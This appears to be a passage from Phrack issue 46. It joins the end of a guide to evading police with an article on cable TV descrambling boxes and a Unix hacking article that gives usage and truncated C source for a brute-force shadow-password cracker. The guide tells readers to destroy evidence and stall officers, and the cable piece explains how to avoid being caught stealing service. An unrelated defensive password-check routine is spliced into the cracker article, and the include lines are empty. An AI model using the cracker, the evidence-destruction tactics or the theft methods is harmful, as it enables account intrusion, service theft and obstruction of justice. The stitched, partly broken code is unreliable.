OK. Let's say, just for the sake of argument, that you've decided to take a walk along the wild side and do something illegal. For our purposes, let's say computer hacking (imagine that). There are many things you can do to cover your legal ass, should your activities come to the attention of any of our various friendly law-enforcement agencies nationwide.

-- Part 1: Police Mentality

You must understand the police, if you ever want to be able to thwart them and keep your freedom. Most police, to survive in their jobs, have developed an "Us vs. Them" attitude, which we should tolerate (up to a point). They use this attitude to justify their fascist tactics. "Us" is the police, a brotherhood that keeps the peace, always does right, and never snitches on each other, no matter what the cause. "Them" is the rest of the population. If "They" are not guilty of a specific crime, they must have done something else, and they're doing their damnedest to avoid getting caught.
In addition, many police have cultivated an attitude similar to that of a 15-year-old high school punk: "I'm bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc. Unfortunately, these people have weapons and the authority to support that attitude. Therefore, if the police come to your house, be EXTREMELY polite and subservient; now is not the time to start spouting your opinion about the police state in America today.

Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides adding a charge of "Resisting Arrest" and/or "Assaulting an Officer", it can get very dangerous. The police have been trained in a number of suspect-control techniques, most of which involve twisting body parts at unnatural angles. As if this weren't enough, almost all police carry guns. Start fighting and you'll get a couple broken bones, torn ligaments, or worse, a few bullet wounds (possibly fatal). So remember, be very meek. Show them that you are cowed by their force and their blustering presence, and this will save you a black eye or two on the way down to the station (from tripping and falling, of course).

-- Part 2: Hacker's Security

CARDINAL RULE #1: Get rid of the evidence. No evidence = no case for the prosecutor. The Novice Hacker's Guide from LOD has an excellent way to put this:

    VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law. It doesn't hurt to store everything encrypted on your hard disk, or keep your notes buried in the backyard or in the trunk of your car. You may feel a little funny, but you'll feel a lot funnier when you meet Bruno, your transvestite cellmate who axed his family to death.

Basic hints: Hide all your essential printouts, or burn them if they're trash (remember: police need no warrant to search your trash). Encrypt the files on your hard drive with something nasty, like PGP or RSA. Use a file-wiper, NOT delete, to get rid of them when you're done.
And WIPE, don't FORMAT, your floppies and other magnetic media (better still, degauss them). With a little common sense and a bit of effort, a great deal of legal headaches can be avoided.

-- Part 3A: Polite Entry

Next part. You and your friends are enjoying an evening of trying to polevault the firewall on whitehouse.com, when suddenly you hear a knock at the door. Opening the door, you find a member of the local police force standing outside, asking if he can come in and ask you some questions. Now, here's where you start to piss your pants.

If you were smart, you'll have arranged something beforehand where your friends (or, if there ARE no friends present, an automatic script) are getting rid of the evidence as shown in part 2. If you have no handy means of destroying the data (printouts, floppies, tapes, etc.), throw the whole mess into the bathtub, soak it in lighter fluid, and torch it. It's a helluva mess to clean up, but nothing compared to latrine duty at your nearest federal prison.

While the evidence is being destroyed, you're stalling the police. Ask to see their search warrant and IDs. Mull over each and every one of them for at least 5 minutes. If they have none, start screaming about your 4th Amendment rights. Most importantly: DON'T INVITE THEM IN. They're like vampires: if you let them in, you're fucked. If they see anything even REMOTELY incriminating, that constitutes probable cause for a search and they'll be swarming all over your house like flies on shit. (And guess what! It's legal, because YOU LET THEM IN!)

Now, be aware that this won't stall them forever: they can simply wait outside the house and radio in a request for a search warrant, which will probably be signed by the judge on duty at that time. Remember: "If you're not willing to be searched, you MUST have something to hide!" If there are no friends assisting you, as shown above, USE THIS TIME EFFECTIVELY.
When they get the warrant signed, that will be too late, because you'll have erased/shredded/burned/hidden/etc. all the incriminating evidence.

-- Part 3B: And Suddenly, The Door Burst In

Now, if the police already have a search warrant, they don't need to knock on the door. They can simply kick the door down and waltz in. If you're there at the time, you CAN try and stall them as shown above, by asking to see their search warrant and IDs. This may not work now, because they have you cold, hard, and dead to rights. And, if anything incriminating is in a place where they can find it, you're fucked, because it WILL be used as evidence. But this won't happen to you, because you've already put everything you're not using right at the moment in a safe, HIDDEN, place. Right?

This leaves the computer. If you hear them kicking the door in, keep calm, and run a script you've set up beforehand to low-level-format the drive, wipe all hacking files, encrypt the whole thing, etc. If there are any printouts or media hanging out, try and hide them (probably worthless anyway, but worth a try). The name of the game now is to minimize the damage that can be done to you. The less hard evidence linking you to the "crime", the less of a case the prosecutor will have and the better off you'll be.

-- Part 4: The Arrest

Now is the time to kick all your senses into hyper-record mode. For you to get processed through the system without a hitch, the arrest has to go perfectly, by the numbers. One small slip and you're out through a loophole. Now, the police are aware of this and will be doing their best to see that doesn't happen, but you may get lucky all the same.

First of all: According to the Miranda Act, the police are REQUIRED BY LAW to read you your rights and make sure you understand them. Remember EVERY WORD THEY SAY TO YOU. If they don't say it correctly, you may be able to get off on a technicality.

CARDINAL RULE #2: You have the right to remain silent. EXERCISE IT.
This cannot be stressed enough. If you need a reminder, listen to the first part of the Miranda Warning: "You have the right to remain silent. If you give up that right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT OF LAW." Nice ring to it, hmm?

The only words coming out of your mouth at this point should be "I'd like to speak to my attorney, please" and, if applicable in your area, "I'd like to make a phone call, please" (remember the "please's," see part #1 above) Nothing else. There are tape recorders, video cameras, PLUS the word of a dozen police officers to back it all up. How's that for an array of damning evidence against you?

Then, after the ride downtown, you'll be booked and probably asked a few questions. Say nothing. You're probably pissing your pants with fear at this point, and may be tempted to roll over on everyone you ever shook hands with in your whole life, but keep your calm, and KEEP QUIET. Keep asking for your attorney and/or a phone call, no matter WHAT threats/deals/etc. they make to you. Remember, they can't legally interrogate you without your attorney present.

You may also be tempted to show your mettle at this point, and give them false information, but remember one thing: If you lie to them, you can be convicted of perjury (a nasty offense itself). The best policy here is NSA: Never Say Anything. Remember, you never have to keep track of what you've said, or have to worry about having it used against you, if you've said NOTHING.

-- Part 5: The Trial

Here, we'll assume you've been arrested, booked, let out on bail, indicted on X counts of so-and-so, etc. You're now in the system.

CARDINAL RULE #3: Get the best criminal defense attorney you can afford, preferably one with some background in the crime you've committed. No, scratch that: make that the best criminal defense attorney, PERIOD.
It's a helluva lot better to spend 5 years working at McDonald's 12 hours a day to pay back your legal fee, than it is to spend 5 years in the slammer getting pimped out nightly for a pack of menthols.

Also, pay attention during the trial. Remember, the defense attorney is working for YOU: it's YOUR life they're deciding, so give him every bit of information and help you can. You're paying him to sort it out for you, but you should still keep an eye on things: if, in the middle of a trial, something happens (you get a killer idea, or want to jump up and scream "BULLSHIT!"), TELL HIM! It very well might be useful! Also, have him nitpick every single thing for loopholes, technicalities, civil rights violations, etc. It's worth it if it pays off.

Another important thing is to look good. Image is everything. Although you might prefer to wear heavily stained rock-band T-shirts, leather jackets, ratty jeans, etc. in real life, that will be EXTREMELY damning in the eyes of the judge/jury. They say that clothes make the man, and in this case it's REALLY true: get a suit, comb/cut your hair, shave, etc. Make yourself look like a "positively respectable darling" in the eyes of the court! It'll pay off for you. (hey, it worked for Eric and Lyle Menendez)

-- Part 8: The Prison

If you're here, you're totally fucked. Unless, by divine intervention, your conviction is overturned on appeal, you'd better clear up the next 5 years on your calendar. Apparently, you didn't read closely enough, so read this every day during your long stay in prison, and you'll be better equipped next time (assuming there IS a next time..... :)

Remember the cardinal rules:

1) Don't leave evidence around to be found.
2) KEEP CALM AND KEEP QUIET.
3) Get the best attorney available.

If you remember these, and exercise some common sense and a lot of caution, you should have no problem handling any legal problems that come up.
Note: This is intended to be used as a handbook for defense from minor crimes ONLY (hacking, DWI, etc.) If you're a career criminal, or you've murdered or raped somebody, you're scum, and at least have the grace to plead "guilty". Don't waste the taxpayers' time and money with fancy legal footwork.

Please feel free to add anything or correct this document. However, if you DO add or correct something, PLEASE make sure it's true, and PLEASE email me the changes so I can include them in the next revision of the document. My address is pstlb@acad3.alaska.edu. Happy hacking to all, and if this helps you avoid getting caught, so much the better. :)

                         ==Phrack Magazine==

              Volume Five, Issue Forty-Six, File 10 of 28

****************************************************************************

                      /**************************/
                      /* A Guide to Porno Boxes */
                      /*      by Carl Corey     */
                      /**************************/

Keeping with tradition, and seeing that this is the first article in Phrack on cable TV descrambling, any illegal box for use in descrambling cable television signals is now known as a PORNO BOX.

There are many methods that cable companies use to ensure that you get what you pay for - and _only_ what you pay for. Of course, there are always methods to get 'more than you pay for'. This file will discuss the most important aspects of these methods, with pointers to more detailed information, including schematics and resellers of equipment.

Part I. How the cable company keeps you from getting signals

A brief history

---Older Systems---

Most scrambling methods are, in theory, simple. The original method used to block out signals was the trap method. All traps remove signals that are sent from the CATV head end (the CATV company's station). The first method, which is rarely used anymore, was the negative trap. Basically, every point where the line was dropped had these traps, which removed the pay stations from your signal.
If you decided to add a pay station, the company would come out and remove the trap. This method was pretty secure - you would provide physical evidence of tampering if you climbed the pole to remove them or alter them (sticking a pin through them seemed to work randomly, but could affect other channels, as it shifts the frequency the trap removes.) This was a very secure system, but did not allow for PPV or other services, and required a lot of physical labor (pole-climbers aren't cheap). The only place this is used anymore is in an old apartment building, as one trip can service several programming changes. Look for a big gray box in the basement with a lot of coax going out. If you are going to give yourself free service, give some random others free service to hide the trail.

The next method used was termed a positive trap. With this method, the cable company sends a _very_ strong signal above the real signal. A tuner sees the strong signal, and locks onto the 'garbage' signal. A loud beeping and static lines would show up on the set. For the CATV company to enable a station, they put a 'positive' trap on the line, which (despite the name) removes the garbage signal. Many text files have been around on how to descramble this method (overlooking the obvious, buying a (cheap) notch filter), ranging from making a crude variable trap, to adding wires to the cable signal randomly to remove the signal. This system is hardly used anymore, as you could just put a trap inside your house, which wouldn't be noticed outside the house.

---Current Systems---

The next advent in technology was the box. The discussion of different boxes follows, but there is one rather new technology which should be discussed with the traps. The addressable trap is the CATV's dream.
It combines the best features of the negative trap (very difficult to tamper with without leaving evidence) with features of addressable boxes (no lineman needs to go out to add a service, computers can process Pay Per View or other services). Basically, a 'smart trap' sits on the pole and removes signals at will. Many systems require a small amp inside the house, which the cable company uses to make sure that you don't hook up more than one TV. I believe that the new CATV act makes this illegal, and that a customer does not have to pay for any extra sets (which do not need equipment) in the house. Of course, we all know that the cable TV company will do whatever it wants until it is threatened with lawsuits.

Cable boxes use many different methods of descrambling. Most are not in use anymore, with a few still around, and a few around the corner in the future. The big thing to remember is sync suppression. This method is how the cable companies make the picture look like a really fucked up, waving Dali painting. Presently the most popular method is the Tri-mode In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10 dB. The sync can be changed randomly once per field, and the information necessary for the box to rebuild a sync signal. This very common system is discussed in Radio-Electronics magazine in the 2/87 issue. There are schematics and much more detailed theory than is provided here.

The other common method currently used is SSAVI, which is most common on Zenith boxes. It stands for Sync Suppression And Video Inversion. In addition to sync suppression, it uses video inversion to also 'scramble' the video. There is no sync signal transmitted separately (or reference signal to tell the box how to de-scramble) as the first 26 lines (blank, above the picture) are not de-synched, and can be re-synched with a phase-locked loop - giving sync to the whole field.
The data on inversion is sent somewhere in the 20th or 21st line, which is outside of the screen. Audio can be scrambled too, but it is actually just moved to a different frequency. Radio Electronics August 92 on has circuits and other info in the Drawing Board column.

---Future Systems---

For Pioneer, the future is now. The system the new Pioneers use is patented and Pioneer doesn't want you to know how it works. From the patent, it appears to use combinations of in-band, out-band, and keys (also sending false keys) to scramble and relay info necessary to descramble. These boxes are damn slick. The relevant patents are US #5,113,411 and US #4,149,158 if you care to look. There is not much information to be gained from them. Look for future updates to this article with info on the system if I can find any :)

Other systems are the VideoCipher + (used on satellites now - this is scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are similar, with Digi encrypting the video with DES also (yikes)... And they all use changing keys and other methods. Oak Sigma converters use similar methods which are available now on cable. (digital encryption of audio, etc...)

Part II. How the cable company catches you getting those signals

There are many methods the CATV company can use to catch you, or at least keep you from using certain methods.

Market Code: Almost _all_ addressable decoders now use a market code. This is part of the serial number (which is used for pay per view addressing) which decodes to a general geographic region. Most boxes contain code which tells them to shut down if they receive a code (which can be going to any box on the cable system) which is from a different market area. So if you buy a converter that is say, market-coded for Los Angeles, you won't be able to use it in New York.

Bullets: The bullet is a shut down code like above - it will make your box say 'bAh' and die.
The method used most is for the head end to send messages to every box they know of saying 'ignore the next shutdown message' ... and once every (legit) box has this info, it sends the bullet. The only boxes that actually process the bullet are ones which the CATV system doesn't know about.

P.S. Don't call the cable company and complain about cable if you are using an illegal converter - and be sure to warn anyone you live with about calling the CATV co. also.

Leak Detection: The FCC forces all cable companies to drive around and look for leaks - any poor splice jobs (wiring your house from a neighbor's without sealing it up nice) and some descramblers will emit RF. So while the CATV is looking for the leaks, they may catch you.

Free T-Shirts: The cable company can, with most boxes, tell the box to display a different signal. So they can tell every box they know of (the legit box pool) to display a commercial on another channel, while the pirate boxes get this real cool ad with an 1800 number for free t-shirts... you call, you get busted. This is mostly done during PPV boxing or other events which are paid for - as the company knows exactly who should get that signal, and can catch even legit boxes which are modified to receive the fight.

Your Pals: Programs like "Turn in a cable pirate and get $100" let you know who your friends _really_ are.

Part III: How to get away with it.

I get a lot of questions about opening a box that you own. This is not a good idea. Most, if not ALL boxes today have a tamper sensor. If you open the box, you break a tab, flip a switch, etc... This disables the box and leaves a nice piece of evidence for the CATV co. to show that you played with it.

I also have had questions about the old "unplug the box when it is enabled, then plug it back in later"... The CATV company periodically sends a signal to update all the boxes to where they should be.
If you want to do this, you'll need to find out where the CATV sends the address information, and then you need to trap it out of the signal. So as soon as the fraudulent customer (let's call him Chris) sees his box get the signal to receive the PPV porn channel, he installs the trap and now his box will never get any pay per view signals again... but he'll always have whatever he was viewing at the time he put the trap in. Big problem here is that most _newer_ systems also tell the box how long it can descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3 hours have passed"...

Where to make/buy/get porno boxes:

You can order a box which has been modified not to accept bullets. This method is pretty expensive. You can also get a 'pan' descrambler - it is a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and descrambles it. These boxes can't be killed by the bullets, and work pretty well. There are some pans which are made by the same company as your cable box and are sensitive to bullets, so beware.

There are two basic ideas for modifying a box (provided you get detailed instructions on how to get it open, or how to fix it once you open it). You can change the S/N to something which is known as 'universal' or disassemble the code and remove the jump to the shutdown code. The universal codes are rare, and may be extinct. Besides, if the cable company finds out your code, they can nuke it. This happens when someone who makes (err made) 'universal' chips gets busted. The modification of the actual code is the best way to do it, just forcing a positive response to permission checks is the easiest way.

A 'cube' is not a NeXT, it's a device which removes the data signal from the cable line, and inserts a 'nice' data signal which tells your box to turn everything on.
A 'destructive' cube actually re-programs all the boxes below it to a new serial number and gives that number full privileges, while a 'non-destructive' cube needs to know your box's serial number, so it can tell your box (without modifications) that it can view everything. You have to get a new IC if you change boxes, but the plus is that you can remove the cube and the box functions as normal. Then again, you have to trust the place you are ordering the cube from to not be working for the cable company, as you have to give them your box serial number - which the CATV cable has in their records. Cubes have been seen for sale in the back of Electronics Now (formerly Radio Electronics).

Of course, you could check in the above mentioned articles and build circuitry, it would be a lot cheaper. The only problem is that you have to be good enough not to fuck it up - TV signals are very easy to fuck up.

Then there is the HOLY GRAIL. Most scrambling systems mess with the sync pulse. This pulse is followed by the colorburst signal on NTSC video. Basically, the grail finds the colorburst and uses it as a reference signal. In theory, it works wonderfully (but does not fix the video inversion problems found on SSAVI systems). However, with the sync pulse whacked, the colorburst method may give weak color or color shifts. The schematics are in the May 1990 Radio-Electronics. I have also received email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is a modified (supposedly higher quality) version of the R-E schematics. The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and etched board. A little steep, but not too bad. E-mail the above for more information.

Anyway, that's all for now. Remember, information (including XXX movies) wants to be free!
Carl Corey / dEs

                         ==Phrack Magazine==

              Volume Five, Issue Forty-Six, File 11 of 28

****************************************************************************

                    ***********************************
                    * Unix Hacking Tools of the Trade *
                    *                                 *
                    *                By               *
                    *                                 *
                    *  The Shining/UPi (UK Division)  *
                    ***********************************

Disclaimer :

The following text is for educational purposes only and I strongly suggest that it is not used for malicious purposes....yeah right!

Introduction :

Ok, I decided to release this phile to help out all you guys who wish to start hacking unix. Although these programs should compile & run on your system if you follow the instructions I have given, knowing a bit of C will come in handy if things go wrong. Other docs I suggest you read are older 'phrack' issues with Shooting Shark's various articles on unix, and of course, 'Unix from the ground up' by The Prophet.

This article includes three programs, a SUNOS Brute force Shadow password file cracker, The Ultimate Login Spoof, and a Unix Account Validator.

Shadow Crack
------------

SUNOS Unix brute force shadow password file cracker
---------------------------------------------------

Well, a while back, I saw an article in phrack which included a brute force password cracker for unix. This was a nice idea, except that these days more and more systems are moving towards the shadow password scheme. This, for those of you who are new to unix, involves storing the actual encrypted passwords in a different file, usually only accessible to root. A typical entry from a System V R4 password file looks like this :-

    root:x:0:1:Sys. admin:/:/bin/sh

with the actual encrypted password replaced by an 'x' in the /etc/passwd file.
The encrypted password is stored in a file (in the case of sysV) called /etc/shadow which has roughly the following format :-

    root:XyfgFekj95Fpq:::::

this includes the login i.d., the encrypted password, and various other fields which hold info on password ageing etc...(no entry in the other fields indicates they are disabled).

Now this was fine as long as we stayed away from system V's, but now a whole load of other companies have jumped on the bandwagon from IBM (aix) to Sun's SUNOS systems. The system I will be dealing with is SUNOS's shadowed system. Now, like sysV, SUNOS also has a system whereby the actual encrypted passwords are stored in a file usually called /etc/security/passwd.adjunct, and normally this is accessible only by root. This rules out the use of brute force crackers, like the one in phrack quite a while back, and also modern day programs like CRACK. A typical /etc/passwd file entry on shadowed SUNOS systems looks like this :-

    root:##root:0:1:System Administrator:/:/bin/csh

with the 'shadow' password file taking roughly the same format as that of Sys V, usually with some extra fields.

However, we cannot use a program like CRACK, but SUNOS also supplied a function called pwdauth(), which basically takes two arguments, a login name and decrypted password, which is then encrypted and compared to the appropriate entry in the shadow file, thus if it matches, we have a valid i.d. & password, if not, we don't.

I therefore decided to write a program which would exploit this function, and could be used to get valid i.d's and passwords even on a shadowed system!

To my knowledge the use of the pwdauth() function is not logged, but I could be wrong. I have left it running for a while on the system I use and it has attracted no attention, and the administrator knows his shit. I have seen the functions getspwent() and getspwnam() in Sys V to manipulate the shadow password file, but not a function like pwdauth() that will actually validate the i.d.
and password. If such a function does exist on other shadowed systems then this program could be very easily modified to work without problems.

The only real beef I have about this program is that because the pwdauth() function uses the standard unix crypt() function to encrypt the supplied password, it is very slow!!! Even in burst mode, a password file with 1000's of users could take a while to get through. My advice is to run it in the background and direct all its screen output to /dev/null like so :-

    shcrack -mf -uroot -ddict1 > /dev/null &

Then you can log out then come back and check on it later!

The program works in a number of modes, all of which I will describe below, is command line driven, and can be used to crack both multiple accounts in the password file and single accounts specified. It is also NIS/NFS (Sun Yellow Pages) compatible.

How to use it
-------------

    shcrack -m[mode] -p[password file] -u[user id] -d[dictionary file]

Usage :-

-m[mode]  there are 3 modes of operation :-

    -mb  Burst mode, this scans the password file, trying the minimum number of password guessing strategies on every account.

    -mi  Mini-burst mode, this also scans the password file, and tries most password guessing strategies on every account.

    -mf  Brute-force mode, tries all password strategies, including the use of words from a dictionary, on a single account specified.

more about these modes in a sec, the other options are :-

-p[password file]  This is the password file you wish to use, if this is left unspecified, the default is /etc/passwd. NB: The program automatically detects and uses the password file wherever it may be in NIS/NFS systems.

-u[user id]  The login i.d. of the account you wish to crack, this is used in Brute-force single user mode.

-d[dict file]  This uses the words in a dictionary file to generate possible passwords for use in single user brute force mode.
    If no filename is specified, the program only uses the password guessing strategies without using the dictionary.

Modes
^^^^^

-mb  Burst mode basically gets each account from the appropriate password file and uses two methods to guess its password. Firstly, it uses the account name as a password, this name is then reversed and tried as a possible password. This may seem like a weak strategy, but remember, the users' passwords are already shadowed, and therefore are deemed to be secure. This can lead to sloppy passwords being used, and I have come across many cases where the user has used his/her i.d. as a password.

-mi  Mini-burst mode uses a number of other password generating methods as well as the 2 listed in burst mode. One of the methods involves taking the login i.d. of the account being cracked, and appending the numbers 0 to 9 to the end of it to generate possible passwords. If this mode has no luck, it then uses the account's gecos 'comment' information from the password file, splitting it into words and trying these as passwords. Each word from the comment field is also reversed and tried as a possible password.

-mf  Brute-force single user mode uses all the above techniques for password guessing as well as using a dictionary file to provide possible passwords to crack a single account specified. If no dictionary filename is given, this mode operates on the single account using the same methods as mini-burst mode, without the dictionary.

Using shadow crack
------------------

To get program help from the command line just type :-

    $ shcrack

which will show you all the modes of operation.
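Read from the administrator's side, the three modes described above are a list of what a password-change check has to refuse. The following is an added example, not part of the original article or its program: a C function that rejects a proposed password when any of the described strategies would produce it, extended here to ignore letter case. The account data, word list and all function names are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum pw_verdict {
    PW_OK = 0,
    PW_IS_LOGIN,          /* burst: login id used as password        */
    PW_IS_LOGIN_REVERSED, /* burst: login id reversed                */
    PW_IS_LOGIN_DIGIT,    /* mini-burst: login id + one digit 0-9    */
    PW_IS_GECOS_WORD,     /* mini-burst: word from the comment field */
    PW_IS_GECOS_REVERSED, /* mini-burst: comment word reversed       */
    PW_IS_DICT_WORD       /* brute-force: word from a dictionary     */
};

static const char *const VERDICT_NAME[] = {
    "ok", "login id", "login id reversed", "login id + digit",
    "gecos word", "gecos word reversed", "dictionary word"
};

/* Constructed sample data, not taken from the article. */
static const char SAMPLE_LOGIN[] = "jsmith";
static const char SAMPLE_GECOS[] = "John Smith,Room 12,x1234";
static const char *const SAMPLE_DICT[] = { "password", "dragon", "letmein" };
#define SAMPLE_NDICT (sizeof SAMPLE_DICT / sizeof SAMPLE_DICT[0])

/* Case-insensitive equality of two length-delimited strings. */
static int eq_nocase(const char *a, size_t an, const char *b, size_t bn)
{
    size_t i;
    if (an != bn)
        return 0;
    for (i = 0; i < an; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Does a equal b read backwards (case-insensitive)? */
static int eq_reversed(const char *a, size_t an, const char *b, size_t bn)
{
    size_t i;
    if (an != bn)
        return 0;
    for (i = 0; i < an; i++)
        if (tolower((unsigned char)a[i]) !=
            tolower((unsigned char)b[bn - 1 - i]))
            return 0;
    return 1;
}

/* Return the first guessing strategy that would produce cand, or PW_OK. */
enum pw_verdict check_candidate(const char *login, const char *gecos,
                                const char *const *dict, size_t ndict,
                                const char *cand)
{
    size_t cn = strlen(cand), ln = strlen(login), i;
    const char *p = gecos;

    if (eq_nocase(cand, cn, login, ln))
        return PW_IS_LOGIN;
    if (eq_reversed(cand, cn, login, ln))
        return PW_IS_LOGIN_REVERSED;
    if (cn == ln + 1 && isdigit((unsigned char)cand[ln]) &&
        eq_nocase(cand, ln, login, ln))
        return PW_IS_LOGIN_DIGIT;

    /* Split the comment field on spaces and commas, as the article does. */
    while (*p) {
        size_t wn;
        p += strspn(p, " ,");
        wn = strcspn(p, " ,");
        if (wn == 0)
            break;
        if (eq_nocase(cand, cn, p, wn))
            return PW_IS_GECOS_WORD;
        if (eq_reversed(cand, cn, p, wn))
            return PW_IS_GECOS_REVERSED;
        p += wn;
    }

    for (i = 0; i < ndict; i++)
        if (eq_nocase(cand, cn, dict[i], strlen(dict[i])))
            return PW_IS_DICT_WORD;

    return PW_OK;
}

int main(void)
{
    static const char *const tries[] = {
        "jsmith", "htimsj", "JSmith7", "smith", "nhoJ", "dragon", "t7#Lq9vW"
    };
    size_t i;

    for (i = 0; i < sizeof tries / sizeof tries[0]; i++)
        printf("%-10s -> %s\n", tries[i],
               VERDICT_NAME[check_candidate(SAMPLE_LOGIN, SAMPLE_GECOS,
                                            SAMPLE_DICT, SAMPLE_NDICT,
                                            tries[i])]);
    return 0;
}
```

A check like this belongs in the password-change path, where the plaintext candidate is available; it cannot be run after the fact against stored hashes without repeating the guessing itself.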
If you wanted to crack just the account 'root', located in /etc/passwd (or elsewhere on NFS/NIS systems), using all methods including a dictionary file called 'dict1', you would do :-

    $ shcrack -mf -uroot -ddict1

to do the above without using the dictionary file, do :-

    $ shcrack -mf -uroot

or to do the above but in password file 'miner' do :-

    $ shcrack -mf -pminer -uroot

to start cracking all accounts in /etc/passwd, using minimum password strategies do :-

    $ shcrack -mb

to do the above but on a password file called 'miner' in your home directory do :-

    $ shcrack -mb -pminer

to start cracking all accounts in 'miner', using all strategies except dictionary words do :-

    $ shcrack -mi -pminer

ok, here's the code, ANSI C Compilers only :-

---cut here-------------------------------------------------------------------
/* Program   : Shadow Crack
   Author    : (c)1994 The Shining/UPi (UK Division)
   Date      : Released 12/4/94
   Unix type : SUNOS Shadowed systems only */

#include
#include
#include
#include
#include

#define WORDSIZE 20     /* Maximum word size */
#define OUTFILE "data"  /* File to store cracked account info */

void word_strat( void ), do_dict( void );
void add_nums( char * ), do_comment( char * );
void try_word( char * ), reverse_word( char * );
void find_mode( void ), burst_mode( void );
void mini_burst( void ), brute_force( void );
void user_info( void ), write_details( char * );
void pwfile_name( void ), disable_interrupts( void ), cleanup();

char *logname, *comment, *homedir, *shell, *dict, *mode,
     *pwfile, *pwdauth();
struct passwd *getpwnam(), *pwentry;
extern char *optarg;
int option, uid, gid;

int main( int argc, char **argv )
{
  disable_interrupts();
  system("clear");

  if (argc < 2) {
    printf("Shadow Crack - (c)1994 The Shining\n");
    printf("SUNOS Shadow password brute force cracker\n\n");
    printf("useage: %s -m[mode] -p[pwfile] -u[loginid] ", argv[0]);
    printf("-d[dictfile]\n\n\n");
    printf("[b] is burst mode, scans pwfile trying minimum\n");
    printf(" password strategies on all i.d's\n\n");
    printf("[i] is mini-burst mode, scans pwfile trying both\n");
    printf(" userid, gecos info, and numbers to all i.d's\n\n");
    printf("[f] is bruteforce mode, tries all above stategies\n");
    printf(" as well as dictionary words\n\n");
    printf("[pwfile] Uses the password file [pwfile], default\n");
    printf(" is /etc/passwd\n\n");
    printf("[loginid] Account you wish to crack, used with\n");
    printf(" -mf bruteforce mode only\n\n");
    printf("[dictfile] uses dictionary file [dictfile] to\n");
    printf(" generate passwords when used with\n");
    printf(" -mf bruteforce mode only\n\n");
    exit(0);
  }

  /* Get options from the command line and store them in different
     variables */
  while ((option = getopt(argc, argv, "m:p:u:d:")) != EOF)
    switch(option) {
      case 'm':
        mode = optarg;
        break;
      case 'p':
        pwfile = optarg;
        break;
      case 'u':
        logname = optarg;
        break;
      case 'd':
        dict = optarg;
        break;
      default:
        printf("wrong options\n");
        break;
    }

  find_mode();
}

/* Routine to redirect interrupts */
void disable_interrupts( void )
{
  signal(SIGHUP, SIG_IGN);
  signal(SIGTSTP, cleanup);
  signal(SIGINT, cleanup);
  signal(SIGQUIT, cleanup);
  signal(SIGTERM, cleanup);
}

/* If CTRL-Z or CTRL-C is pressed, clean up & quit */
void cleanup( void )
{
  FILE *fp;

  if ((fp = fopen("gecos", "r")) != NULL)
    remove("gecos");

  if ((fp = fopen("data", "r")) == NULL)
    printf("\nNo accounts cracked\n");

  printf("Quitting\n");
  exit(0);
}

/* Function to decide which mode is being used and call appropriate
   routine */
void find_mode( void )
{
  if (strcmp(mode, "b") == NULL)
    burst_mode();
  else if (strcmp(mode, "i") == NULL)
    mini_burst();
  else if (strcmp(mode, "f") == NULL)
    brute_force();
  else {
    printf("Sorry - No such mode\n");
    exit(0);
  }
}

/* Get a users information from the password file */
void user_info( void )
{
  uid = pwentry->pw_uid;
  gid = pwentry->pw_gid;
  comment = pwentry->pw_gecos;
  homedir = pwentry->pw_dir;
  shell = pwentry->pw_shell;
}

/* Set the filename of the password file to be used, default is
   /etc/passwd */
void
pwfile_name( void )
{
  if (pwfile != NULL)
    setpwfile(pwfile);
}

/* Burst mode, tries user i.d. & then reverses it as possible passwords
   on every account found in the password file */
void burst_mode( void )
{
  pwfile_name();
  setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL) {
    logname = pwentry->pw_name;
    user_info();
    try_word( logname );
    reverse_word( logname );
  }

  endpwent();
}

/* Mini-burst mode, try above combinations as well as other strategies
   which include adding numbers to the end of the user i.d. to generate
   passwords or using the comment field information in the password
   file */
void mini_burst( void )
{
  pwfile_name();
  setpwent();

  while ((pwentry = getpwent()) != (struct passwd *) NULL) {
    logname = pwentry->pw_name;
    user_info();
    word_strat();
  }

  endpwent();
}

/* Brute force mode, uses all the above strategies as well using a
   dictionary file to generate possible passwords */
void brute_force( void )
{
  pwfile_name();
  setpwent();

  if ((pwentry = getpwnam(logname)) == (struct passwd *) NULL) {
    printf("Sorry - User unknown\n");
    exit(0);
  }
  else {
    user_info();
    word_strat();
    do_dict();
  }

  endpwent();
}

/* Calls the various password guessing strategies */
void word_strat()
{
  try_word( logname );
  reverse_word( logname );
  add_nums( logname );
  do_comment( comment );
}

/* Takes the user name as its argument and then generates possible
   passwords by adding the numbers 0-9 to the end. If the username
   is greater than 7 characters, don't bother */
void add_nums( char *wd )
{
  int i;
  char temp[2], buff[WORDSIZE];

  if (strlen(wd) < 8) {
    for (i = 0; i < 10; i++) {
      strcpy(buff, wd);
      sprintf(temp, "%d", i);
      strcat(wd, temp);
      try_word( wd );
      strcpy(wd, buff);
    }
  }
}

/* Gets info from the 'gecos' comment field in the password file,
   then process this information generating possible passwords from it */
void do_comment( char *wd )
{
  FILE *fp;
  char temp[2], buff[WORDSIZE];
  int c, flag;

  flag = 0;

  /* Open file & store users gecos information in it.
     w+ mode allows us to write to it & then read from it. */
  if ((fp = fopen("gecos", "w+")) == NULL) {
    printf("Error writing gecos info\n");
    exit(0);
  }

  fprintf(fp, "%s\n", wd);
  rewind(fp);
  strcpy(buff, "");

  /* Process users gecos information, separate words by checking for
     the ',' field separater or a space. */
  while ((c = fgetc(fp)) != EOF) {
    if (( c != ',' ) && ( c != ' ' )) {
      sprintf(temp, "%c", c);
      strncat(buff, temp, 1);
    }
    else
      flag = 1;

    if ((isspace(c)) || (c == ',') != NULL) {
      if (flag == 1) {
        c=fgetc(fp);
        if ((isspace(c)) || (iscntrl(c) == NULL))
          ungetc(c, fp);
      }

      try_word(buff);
      reverse_word(buff);
      strcpy(buff, "");
      flag = 0;
      strcpy(temp, "");
    }
  }

  fclose(fp);
  remove("gecos");
}

/* Takes a string of characters as its argument(in this case the login
